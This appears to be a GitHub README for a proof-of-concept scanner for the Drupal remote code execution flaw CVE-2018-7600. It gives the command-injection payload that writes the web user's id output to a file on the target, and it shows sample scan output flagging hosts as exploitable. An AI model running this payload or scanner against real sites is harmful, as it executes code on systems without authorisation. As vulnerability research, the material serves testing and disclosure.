Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

How it works

It sends a packet to the drupal_ajax wrapper to register a user. Allows user to use the exec markup and run bash. This PoC sends a the user name and id to abcde.txt.
```
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
```

Checks http*://example.com/abcde.txt

[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text

Payloads

%s = file name

User ID, PID, and Group Payload

echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s

Thanks to

Thanks to Vitalii Rudnykh

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002

How it works

Payloads

Thanks to

Provided only for educational or information purposes.

Files

README.md

Latest commit

History

README.md

File metadata and controls

Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002

How it works

Payloads

Thanks to

Provided only for educational or information purposes.